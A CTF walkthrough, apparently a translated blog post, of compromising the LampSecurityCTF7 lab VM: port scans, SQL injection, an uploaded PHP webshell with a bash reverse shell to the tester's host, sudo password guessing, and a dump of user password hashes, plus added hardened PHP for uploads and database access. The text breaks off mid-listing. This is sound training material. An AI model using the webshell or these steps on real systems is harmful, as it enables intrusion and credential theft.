LampSecurityCTF7 target VM penetration test (SQL injection, file upload, password spraying)

2024/9/30 22:17:47

Target VM overview

LampSecurityCTF7, a VulnHub target VM

Host discovery

Because of a configuration issue on the target VM, its IP could not be found by scanning at first.

Pay special attention here: when the target VM is started for the first time, VMware shows a prompt asking whether you copied or moved the virtual machine. Always choose "I moved it"; only then is the network environment reproduced intact. Otherwise the host-discovery scan may fail to find the VM. If host discovery really does fail later, don't panic: just reimport the VM.
(https://blog.csdn.net/Bossfrank/article/details/131324929)

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.50.0/24
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:32 CST
Nmap scan report for 192.168.50.1
Host is up (0.00016s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.50.134
Host is up (0.00011s latency).
MAC Address: 00:0C:29:83:4F:85 (VMware)
Nmap scan report for 192.168.50.156
Host is up (0.000081s latency).
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Nmap scan report for 192.168.50.254
Host is up (0.00013s latency).
MAC Address: 00:50:56:EC:05:7B (VMware)
Nmap scan report for 192.168.50.147
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 27.90 seconds


┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.50.156                                       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:42 CST
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00044s latency).
Not shown: 65505 filtered tcp ports (no-response), 21 filtered tcp ports (host-prohibited)
PORT      STATE  SERVICE
22/tcp    open   ssh
80/tcp    open   http
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
901/tcp   open   samba-swat
5900/tcp  closed vnc
8080/tcp  open   http-proxy
10000/tcp open   snet-sensor-mgmt
MAC Address: 00:0C:29:9D:12:A9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds
                                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p22,80,137,138,139,901,5900,8080,10000 192.168.50.156      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:46 CST
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00042s latency).

PORT      STATE  SERVICE     VERSION
22/tcp    open   ssh         OpenSSH 5.3 (protocol 2.0)
80/tcp    open   http        Apache httpd 2.2.15 ((CentOS))
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
901/tcp   open   http        Samba SWAT administration server
5900/tcp  closed vnc
8080/tcp  open   http        Apache httpd 2.2.15 ((CentOS))
10000/tcp open   http        MiniServ 1.610 (Webmin httpd)
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Aggressive OS guesses: Linux 2.6.32 - 3.13 (97%), Linux 2.6.39 (96%), Linux 2.6.32 - 3.10 (94%), Linux 2.6.32 (92%), Linux 3.2 - 3.8 (92%), Linux 2.6.22 - 2.6.36 (91%), Linux 3.10 - 4.11 (91%), Tandberg Video Conference System (91%), Linux 2.6.32 - 3.1 (91%), Linux 2.6.32 - 2.6.39 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.89 seconds
                                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --min-rate 1000 -p- 192.168.50.156                           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:49 CST
Warning: 192.168.50.156 giving up on port because retransmission cap hit (10).
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00039s latency).
All 65535 scanned ports on bogon (192.168.50.156) are in ignored states.
Not shown: 64800 open|filtered udp ports (no-response), 735 filtered udp ports (host-prohibited)
MAC Address: 00:0C:29:9D:12:A9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 719.01 seconds


Vulnerability script scan (very slow, not sure why)

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80,137,138,139,901,5900,8080,10000 192.168.50.156
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 11:32 CST
Stats: 0:26:52 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 96.80% done; ETC: 12:00 (0:00:53 remaining)
Stats: 0:35:53 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.34% done; ETC: 12:09 (0:00:59 remaining)
Stats: 0:43:13 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.22% done; ETC: 12:16 (0:00:47 remaining)
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00030s latency).

PORT      STATE  SERVICE
22/tcp    open   ssh
80/tcp    open   http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|_    Couldn't find a file-type field.
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
901/tcp   open   samba-swat
5900/tcp  closed vnc
8080/tcp  open   http-proxy
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-trace: TRACE is enabled
| http-enum: 
|_  /login.php: Possible admin folder
10000/tcp open   snet-sensor-mgmt
MAC Address: 00:0C:29:9D:12:A9 (VMware)

Host script results:
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
| smb-vuln-cve2009-3103: 
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|           
|     Disclosure date: 2009-09-08
|     References:
|       http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms06-025: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: false
|_samba-vuln-cve-2012-1182: SMB: Failed to receive bytes: EOF
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 3316.13 seconds


Web penetration

Let's try injection.
Tried injecting on port 8080 without success; the comment syntax for this database version seems to be the problem. An error message is returned, which is worth a look.
Injecting this way (as in the screenshot) works.
There is an upload feature, so consider uploading a webshell.

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ vim shell.php    
                                                                                                                                                           
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat shell.php          
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.50.147/1234 0>&1'"); ?>
   

Next, find where shell.php ended up so it can call back a shell to Kali.
Directory scan; the uploaded file shows up under assets.

┌──(kali㉿kali)-[~]
└─$ sudo dirb http://192.168.50.156/                                              
[sudo] password for kali: 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Sep 27 13:54:34 2024
URL_BASE: http://192.168.50.156/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.50.156/ ----
+ http://192.168.50.156/about (CODE:200|SIZE:4910)                                                                                                        
==> DIRECTORY: http://192.168.50.156/assets/                                                                                                              
+ http://192.168.50.156/backups (CODE:301|SIZE:333)                                                                                                       
+ http://192.168.50.156/cgi-bin/ (CODE:403|SIZE:290)                                                                                                      
+ http://192.168.50.156/contact (CODE:200|SIZE:5017)                                                                                                      
==> DIRECTORY: http://192.168.50.156/css/                                                                                                                 
+ http://192.168.50.156/db (CODE:200|SIZE:3904)                                                                                                           
+ http://192.168.50.156/default (CODE:200|SIZE:6058)                                                                                                      
+ http://192.168.50.156/footer (CODE:200|SIZE:3904)                                                                                                       
+ http://192.168.50.156/header (CODE:200|SIZE:3904)                                                                                                       
==> DIRECTORY: http://192.168.50.156/img/                                                                                                                 
==> DIRECTORY: http://192.168.50.156/inc/                                                                                                                 
+ http://192.168.50.156/index.php (CODE:200|SIZE:6058)                                                                                                    
==> DIRECTORY: http://192.168.50.156/js/                                                                                                                  
+ http://192.168.50.156/newsletter (CODE:200|SIZE:4037)                                                                                                   
+ http://192.168.50.156/phpinfo (CODE:200|SIZE:58734)                                                                                                     
+ http://192.168.50.156/profile (CODE:200|SIZE:3977)                                                                                                      
+ http://192.168.50.156/read (CODE:302|SIZE:1)                                                                                                            
+ http://192.168.50.156/recovery (CODE:200|SIZE:4807)                                                                                                     
+ http://192.168.50.156/register (CODE:200|SIZE:6591)                                                                                                     
+ http://192.168.50.156/signup (CODE:200|SIZE:4783)                                                                                                       
+ http://192.168.50.156/usage (CODE:403|SIZE:287)                                                                                                         
==> DIRECTORY: http://192.168.50.156/webalizer/                                                                                                           
==> DIRECTORY: http://192.168.50.156/webmail/                                                                                                             
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/inc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webalizer/ ----
+ http://192.168.50.156/webalizer/index.html (CODE:200|SIZE:3631)                                                                                         
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/ ----
+ http://192.168.50.156/webmail/bin (CODE:403|SIZE:293)                                                                                                   
+ http://192.168.50.156/webmail/config (CODE:403|SIZE:296)                                                                                                
+ http://192.168.50.156/webmail/favicon.ico (CODE:200|SIZE:1150)                                                                                          
+ http://192.168.50.156/webmail/index.php (CODE:200|SIZE:5157)                                                                                            
==> DIRECTORY: http://192.168.50.156/webmail/installer/                                                                                                   
+ http://192.168.50.156/webmail/LICENSE (CODE:403|SIZE:297)                                                                                               
+ http://192.168.50.156/webmail/logs (CODE:403|SIZE:294)                                                                                                  
==> DIRECTORY: http://192.168.50.156/webmail/plugins/                                                                                                     
==> DIRECTORY: http://192.168.50.156/webmail/program/                                                                                                     
+ http://192.168.50.156/webmail/README (CODE:403|SIZE:296)                                                                                                
+ http://192.168.50.156/webmail/robots.txt (CODE:200|SIZE:26)                                                                                             
==> DIRECTORY: http://192.168.50.156/webmail/skins/                                                                                                       
+ http://192.168.50.156/webmail/SQL (CODE:403|SIZE:293)                                                                                                   
+ http://192.168.50.156/webmail/temp (CODE:403|SIZE:294)                                                                                                  
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/installer/ ----
==> DIRECTORY: http://192.168.50.156/webmail/installer/images/                                                                                            
+ http://192.168.50.156/webmail/installer/index.php (CODE:302|SIZE:0)                                                                                     
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/archive/                                                                                             
==> DIRECTORY: http://192.168.50.156/webmail/plugins/emoticons/                                                                                           
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/                                                                                                
==> DIRECTORY: http://192.168.50.156/webmail/plugins/password/                                                                                            
==> DIRECTORY: http://192.168.50.156/webmail/plugins/userinfo/                                                                                            
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/program/ ----
(!) WARNING: All responses for this directory seem to be CODE = 403.                                                                                      
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/skins/ ----
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/                                                                                               
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/installer/images/ ----
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/archive/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/archive/skins/                                                                                       
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/emoticons/ ----
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/help/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/content/                                                                                        
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/skins/                                                                                          
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/password/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/password/drivers/                                                                                    
==> DIRECTORY: http://192.168.50.156/webmail/plugins/password/helpers/                                                                                    
+ http://192.168.50.156/webmail/plugins/password/README (CODE:200|SIZE:10645)                                                                             
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/userinfo/ ----
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/skins/classic/ ----
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/images/                                                                                        
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/includes/                                                                                      
+ http://192.168.50.156/webmail/skins/classic/README (CODE:200|SIZE:855)                                                                                  
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/templates/                                                                                     
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/archive/skins/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/archive/skins/classic/                                                                               
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/help/content/ ----
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/help/skins/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/skins/classic/                                                                                  
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/password/drivers/ ----
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/password/helpers/ ----
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/skins/classic/images/ ----
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/images/buttons/                                                                                
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/images/display/                                                                                
+ http://192.168.50.156/webmail/skins/classic/images/favicon.ico (CODE:200|SIZE:1150)                                                                     
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/images/icons/                                                                                  
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/skins/classic/includes/ ----
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/skins/classic/templates/ ----
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/archive/skins/classic/ ----
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/help/skins/classic/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/skins/classic/templates/                                                                        
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/skins/classic/images/buttons/ ----
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/skins/classic/images/display/ ----
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/skins/classic/images/icons/ ----
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/help/skins/classic/templates/ ----
-----------------
END_TIME: Fri Sep 27 13:59:21 2024
DOWNLOADED: 124624 - FOUND: 32

Opening shell.php shows that the server parses it and executes the PHP; Kali receives the shell.
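The upload in this walkthrough accepted shell.php and Apache executed it straight out of assets/. As an added example, not code from the CTF7 target, here is how the upload side could be hardened in PHP 7+; the form field name `document`, the storage path and the allowlist are assumptions:

```php
<?php
// Added example (not from the CTF7 source): a hardened upload handler for the
// kind of "assets" upload the walkthrough abused. The field name 'document',
// $uploadDir and the allowlist are assumptions for illustration.

declare(strict_types=1);

// Server-side allowlist: extension -> the MIME type the bytes must really have.
const ALLOWED = [
    'pdf' => 'application/pdf',
    'png' => 'image/png',
    'jpg' => 'image/jpeg',
];
const MAX_BYTES = 2 * 1024 * 1024;

function validateUpload(array $file, string $uploadDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed with code ' . (int) $file['error']);
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Take the extension only to look it up in the allowlist; .php is not in it.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('extension not allowed');
    }
    // Sniff the real content type: a PHP file renamed to .png fails here.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException("content type $mime does not match .$ext");
    }
    // The server chooses the stored name: no traversal, no double extensions.
    $target = $uploadDir . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('could not store file');
    }
    chmod($target, 0640); // never executable
    return $target;
}

// Assumed path outside the document root, so Apache neither serves nor runs it;
// a separate read endpoint hands files out with Content-Disposition: attachment.
$uploadDir = '/var/lib/website/uploads';

if (isset($_FILES['document'])) {
    try {
        $stored = validateUpload($_FILES['document'], $uploadDir);
        echo 'stored as ' . htmlspecialchars(basename($stored), ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        error_log('upload rejected: ' . $e->getMessage()); // detail stays in the log
        echo 'upload rejected';
    }
}
```

If uploads must stay below the document root, additionally switch the interpreter off for that directory in the Apache configuration (with mod_php, `php_admin_flag engine off` inside a `<Directory /var/www/html/assets>` block), so a file that slips past the checks is served as bytes rather than run. Checking the client-supplied name alone is not enough, which is why the content is sniffed and the server picks the stored name.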

Initial shell

Check some basic information

bash-4.1$ sudo -l
sudo -l
sudo: sorry, you must have a tty to run sudo
bash-4.1$ dpkg -l
dpkg -l
bash: dpkg: command not found
bash-4.1$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:0c:29:9d:12:a9 brd ff:ff:ff:ff:ff:ff
    inet 192.168.50.156/24 brd 192.168.50.255 scope global eth0
    inet6 fe80::20c:29ff:fe9d:12a9/64 scope link 
       valid_lft forever preferred_lft forever
bash-4.1$ python --version
python --version
Python 2.6.6
bash-4.1$ uname -a
uname -a
Linux bogon 2.6.32-279.el6.i686 #1 SMP Fri Jun 22 10:59:55 UTC 2012 i686 i686 i386 GNU/Linux
bash-4.1$ whoami
whoami
apache
bash-4.1$ 

Upgrade the shell with Python.
Trying to check the current user's sudo privileges asks for a password (a credential), which has not been obtained yet.

bash-4.1$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
bash-4.1$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for apache: exit

Sorry, try again.
[sudo] password for apache: root

Sorry, try again.
[sudo] password for apache: admin

Sorry, try again.
sudo: 3 incorrect password attempts

Do some internal information gathering

bash-4.1$ pwd
pwd
/var/www/html/assets
bash-4.1$ cd /var/www    
cd /var/www
bash-4.1$ ls
ls
admin  cgi-bin  error  html  icons
bash-4.1$ cd admin
cd admin
bash-4.1$ ls
ls
docs          index.php   newsletters.php  reservations.php
feedback.php  login.php   phpmyadmin       trainings.php
inc           logout.php  readings.php     users.php
bash-4.1$ ls -liah
ls -liah
total 68K
260349 drwxrwxr-x. 5 webdev webdev 4.0K Dec 19  2012 .
259983 drwxr-xr-x. 7 root   root   4.0K Dec 19  2012 ..
260460 drwxrwxr-x. 2 webdev webdev 4.0K Dec 11  2012 docs
260476 -rw-rw-r--. 1 webdev webdev 1.5K Dec 24  2012 feedback.php
260436 drwxrwxr-x. 2 webdev webdev 4.0K Dec 11  2012 inc
260351 -rw-r--r--. 1 webdev webdev  314 Dec 24  2012 index.php
260442 -rw-rw-r--. 1 webdev webdev  885 Dec 24  2012 login.php
260445 -rw-rw-r--. 1 webdev webdev  236 Dec 24  2012 logout.php
260472 -rw-rw-r--. 1 webdev webdev 3.8K Dec 24  2012 newsletters.php
270632 drwxr-xr-x. 9 root   root   4.0K Dec 19  2012 phpmyadmin
260471 -rw-rw-r--. 1 webdev webdev 6.5K Dec 24  2012 readings.php
270635 -rw-rw-r--. 1 webdev webdev 2.5K Dec 24  2012 reservations.php
260439 -rw-rw-r--. 1 webdev webdev 5.6K Dec 24  2012 trainings.php
260447 -rw-rw-r--. 1 webdev webdev 4.8K Dec 24  2012 users.php
bash-4.1$ cd inc
cd inc
bash-4.1$ ls
ls
admin_footer.php  admin_header.php  base.php  db.php
bash-4.1$ 

Found a database connection file


bash-4.1$ cat db.php
cat db.php
<?php
/**
 * This file is part of the LAMPSecurity CTF 7
 * http://sourceforge.net/projects/lampsecurity
 * by Justin C. Klein Keane
 */

class DatabaseConnection {
        public function __construct() {
                $this->conn = mysql_connect('localhost', 'root', ''); // Change in prod
                if (!$this->conn) die('Could not connect: ' . mysql_error());
                mysql_select_db('website');
        }
        public function query($query) {
                $result = mysql_query($query);
                if (!$result) {
                        $message  = 'Invalid query: ' . mysql_error() . "\n";
                        $message .= 'Whole query: ' . $query;
                        die($message);
                }
                $retval = array();
                while ($row = mysql_fetch_assoc($result)) $retval[] = $row;
                return $retval;
        }
}

function dbin($string) {
        return mysql_real_escape_string($string);
}

$db = new DatabaseConnection();
bash-4.1$ 
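db.php connects as MySQL root with an empty password, its query() takes a pre-built string so each caller's escaping (dbin()) is the only barrier, and die() echoes the failing statement back to the browser, the kind of error output seen during the port 8080 injection attempt. As an added example, not the CTF7 project's code, the same class shape on PDO with prepared statements and a dedicated low-privilege account (the account name `website_app` and the `WEBSITE_DB_PASSWORD` environment variable are assumptions; PHP 7.4+):

```php
<?php
// Added example, not the CTF7 code: DatabaseConnection rebuilt on PDO with
// prepared statements and a least-privilege account. 'website_app' and the
// WEBSITE_DB_PASSWORD environment variable are assumptions.

declare(strict_types=1);

class DatabaseConnection
{
    private PDO $conn;

    public function __construct(string $dsn, string $user, string $password)
    {
        $this->conn = new PDO($dsn, $user, $password, [
            PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION, // no die() with the query text
            PDO::ATTR_EMULATE_PREPARES   => false,                  // server-side prepares
            PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
        ]);
    }

    /** Run a parameterised statement; user data only ever travels in $params. */
    public function query(string $sql, array $params = []): array
    {
        $stmt = $this->conn->prepare($sql);
        $stmt->execute($params);
        return $stmt->fetchAll();
    }
}

// Shape used by the original code: the statement is built from a string, so
// whatever the caller forgot to pass through dbin() becomes part of the SQL.
//   $db->query("SELECT * FROM users WHERE username = '" . $_POST['username'] . "'");

// Hardened shape: the statement's structure is fixed before any value is bound.
function findUser(DatabaseConnection $db, string $username): ?array
{
    $rows = $db->query(
        'SELECT user_id, username, is_admin FROM users WHERE username = :username',
        [':username' => $username]
    );
    return $rows[0] ?? null;
}

// A dedicated account instead of root with an empty password, created on the
// MySQL side with, for example:
//   CREATE USER 'website_app'@'localhost' IDENTIFIED BY '<strong-password>';
//   GRANT SELECT, INSERT, UPDATE ON website.* TO 'website_app'@'localhost';
try {
    $db = new DatabaseConnection(
        'mysql:host=localhost;dbname=website;charset=utf8mb4',
        'website_app',
        getenv('WEBSITE_DB_PASSWORD') ?: ''  // secret comes from the environment, not the file
    );
} catch (PDOException $e) {
    error_log('database unavailable: ' . $e->getMessage()); // detail to the log only
    http_response_code(500);
    exit('service unavailable');
}
```

With ERRMODE_EXCEPTION a failing statement raises a PDOException; catching it at the top level and logging it server-side removes the "Whole query: ..." disclosure that the original die() sends to the client, and the dedicated account means a successful injection can no longer read the mysql or roundcube databases.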

Log in to MySQL (the MySQL client needs an interactive shell for its prompts and output, so upgrading the shell with Python after connecting is the usual step)

bash-4.1$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.1$ mysql -uroot
mysql -uroot
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 88
Server version: 5.1.66 Source distribution

Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 


List the databases.

mysql> 

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| roundcube          |
| website            |
+--------------------+
4 rows in set (0.00 sec)

mysql> use website
use website
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-------------------+
| Tables_in_website |
+-------------------+
| contact           |
| documents         |
| hits              |
| log               |
| newsletter        |
| payment           |
| trainings         |
| trainings_x_users |
| users             |
+-------------------+
9 rows in set (0.00 sec)

mysql>      

Look at the contents of the users table.

mysql> select * from users;
select * from users;
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
| username                      | password                         | is_admin | last_login          | user_id | realname        | profile                                                                  |
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
| brian@localhost.localdomain   | e22f07b17f98e0d9d364584ced0e3c18 |        1 | 2012-12-19 11:30:54 |       3 | Brian Hershel   | Brian is our technical brains behind the operations and a chief trainer. |
| john@localhost.localdomain    | 0d9ff2a4396d6939f80ffe09b1280ee1 |        1 | NULL                |       4 | John Durham     |                                                                          |
| alice@localhost.localdomain   | 2146bf95e8929874fc63d54f50f1d2e3 |        1 | NULL                |       5 | Alice Wonder    |                                                                          |
| ruby@localhost.localdomain    | 9f80ec37f8313728ef3e2f218c79aa23 |        1 | NULL                |       6 | Ruby Spinster   |                                                                          |
| leon@localhost.localdomain    | 5d93ceb70e2bf5daa84ec3d0cd2c731a |        1 | NULL                |       7 | Leon Parnetta   |                                                                          |
| julia@localhost.localdomain   | ed2539fe892d2c52c42a440354e8e3d5 |        1 | NULL                |       8 | Julia Fields    |                                                                          |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |        0 | NULL                |       9 | Michael Saint   |                                                                          |
| bruce@localhost.localdomain   | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |        0 | NULL                |      10 | Bruce Pottricks |                                                                          |
| neil@localhost.localdomain    | 4773408d5358875b3764db552a29ca61 |        0 | NULL                |      11 | Neil Felstein   |                                                                          |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |        0 | NULL                |      12 | Charles Adams   |                                                                          |
| foo@bar.com                   | 4cb9c8a8048fd02294477fcb1a41191a |        0 | NULL                |      36 |                 |                                                                          |
| test@nowhere.com              | 098f6bcd4621d373cade4e832627b4f6 |        0 | NULL                |     113 |                 |                                                                          |
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
12 rows in set (0.00 sec)

Crack the MD5 hashes. First pull only the username and password columns so the output is easy to carry over.


mysql> select username,password from users
select username,password from users
    -> ;
;
+-------------------------------+----------------------------------+
| username                      | password                         |
+-------------------------------+----------------------------------+
| brian@localhost.localdomain   | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain    | 0d9ff2a4396d6939f80ffe09b1280ee1 |
